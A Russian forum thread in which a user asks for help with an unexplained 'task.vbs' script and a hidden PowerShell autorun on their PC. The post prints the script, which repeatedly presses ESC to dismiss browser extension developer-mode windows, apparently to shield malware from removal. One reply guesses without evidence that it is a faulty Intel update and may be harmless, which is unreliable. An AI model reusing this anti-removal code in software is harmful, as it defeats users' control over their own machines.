Top.Mail.Ru
Ответы

Нашёл странный файл "task.vbs" в документах. Что делать?

Ну как нашёл, он сам себя нашёл.
Сижу я за пк, занимаюсь своими делами, как вдруг вылетает оповещение о ошибке при выполнения скрипта "task.vbs" в документах. Я после такого охренел знатна, в автозагрузках такого нет и НЕ БЫЛО!!! Перетащил этот файл на рабочий стол, чтобы он не мог запуститься, так теперь у меня регулярно всплывает оповещение о том что скрипт не нашёл "task.vbs" в документах.
Я решил посмотреть что там, в "task.vbs", открыл через блокнот (без запуска), а там вот этот код:

123456789101112131415
 Set wshShell = CreateObject("WScript.Shell") 

startTime = Now 
doWhileTimeout = 7 / 86400  
Do While Now - startTime < doWhileTimeout  
    If wshShell.AppActivate("mode extensions") or wshShell.AppActivate("разработчика") or wshShell.AppActivate("розробника") Then 
        wshShell.SendKeys "{ESC}" 
    End If 
    WScript.Sleep 10 
Loop 

If Now - startTime >= doWhileTimeout Then 
    WScript.Quit 
End If

Если я правильно понял, этот код в какой-то момент эмитирует нажатие ESC, если да , то я вообще не понимаю , что это и зачем.
Помогите чем сможете, пожалуйста

Небольшое дополнение: я установил антивирус 360 (спорный но рабочий), так он при проверки автозагрузок показал, что там есть скрытая загрузка приложения powershell.exe, приложение оригинальное , т.е оно запускает какой-то скрипт?

По дате
По рейтингу
Новичок
5мес

Можно просто отключить задачу (с помощью Uninstall Tool через раздел авто-запуска перейти в планировщик заданий либо используя Autoruns ), так как она выполняется с ошибкой (автор задачи, возможно, intel).
С файлом может быть всё в порядке.
Читал где-то, что intel выпустили ошибочное обновление из-за которого возникают ошибки, возможно это оно и есть.
На сайте Intel советуют удалить Intel Customer Improvement Program, но они только догадываются о проблеме.
Microsoft тоже советуют отключить.

Профи

Не трогай вирусняк